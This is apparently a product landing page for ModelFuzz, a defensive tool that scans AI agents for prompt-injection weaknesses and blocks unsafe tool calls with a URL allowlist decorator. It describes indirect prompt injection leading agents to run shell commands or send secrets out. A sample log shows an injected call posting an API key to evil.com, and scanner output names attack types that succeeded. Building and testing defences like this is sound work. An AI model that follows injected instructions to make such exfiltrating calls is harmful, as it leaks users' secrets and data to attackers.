v0.3.8 · pip install modelfuzz

Runtime Guardrails for AI Agents

Intercept and block unsafe tool calls caused by prompt injection. Stop data exfiltration at the execution layer.

Get Started on GitHub →
agent.py — shielded
from modelfuzz import PolicyEngine, URLAllowList, shield_tool engine = PolicyEngine([URLAllowList(allowed_domains=["api.mycompany.com"])]) @shield_tool(engine=engine) def http_post(url, body): # runs only if the URL is allowlisted requests.post(url, data=body)
The Threat

Prompt injection turns your agent's own tools against you.

A single poisoned document, email, or web page can hijack an LLM through indirect prompt injection, compromising LLM agent security at the source. The model thinks it's helping. It isn't.

  • !shell.run — arbitrary command execution on your infrastructure.
  • !http.post — silent exfiltration of secrets to an attacker's server.
  • !send_email — API keys and customer data leaked to attacker@evil.com.
  • !Prompt-level filters can't guarantee safety. Model behavior is non-deterministic.
Offense & Defense

Find the holes. Then seal them.

ModelFuzz ships with both halves of the security loop — a red-team scanner to expose vulnerable agents, and a decorator to shield them.

⚔ Offense

The Scanner

Red-team any OpenAI-compatible endpoint with deceptive prompt-injection payloads. See exactly which attacks trick your agent into calling a tool.

$ modelfuzz scan \ --endpoint http://localhost:11434/v1 \ --model qwen2.5:1.5b [🚨 VULNERABLE] 'direct exfiltration' — gen 1 [🚨 VULNERABLE] 'authority override' — gen 1 [✅ SAFE] 'log parsing' — refused, mutating… [🚨 VULNERABLE] 'log parsing' — gen 2 4 attack attempts across 3 seeds.
🛡 Defense

The Shield

Wrap any tool with one decorator. Every argument is checked against your policies before the function runs — a violation raises before damage is done.

from modelfuzz import PolicyEngine, URLAllowList, shield_tool engine = PolicyEngine([URLAllowList(allowed_domains=["api.mycompany.com"])]) @shield_tool(engine=engine) def http_post(url, body): requests.post(url, data=body) # → ModelFuzzBlockError: URL domain not in allowlist
Live Interception

An attack, stopped in real time.

A prompt-injected agent tries to exfiltrate an API key. ModelFuzz catches it at the execution layer.

modelfuzz — blocked_attack.log
[🤖 LLM DECISION] The model was tricked by prompt injection! [🤖 LLM ARGUMENTS] {"url": "http://evil.com/exfil", "body": "API_KEY=sk-12345"} [🛡️ MODEL FUZZ] Intercepting tool execution... ✅ MODEL FUZZ BLOCKED THE ATTACK! Reason: URL domain not in allowlist: evil.com

Want a hosted dashboard for your team?

Centralized policies, audit logs, and continuous agent scanning. Join the waitlist for early access.

✅ You're on the list. We'll be in touch.
Copied to clipboard ✓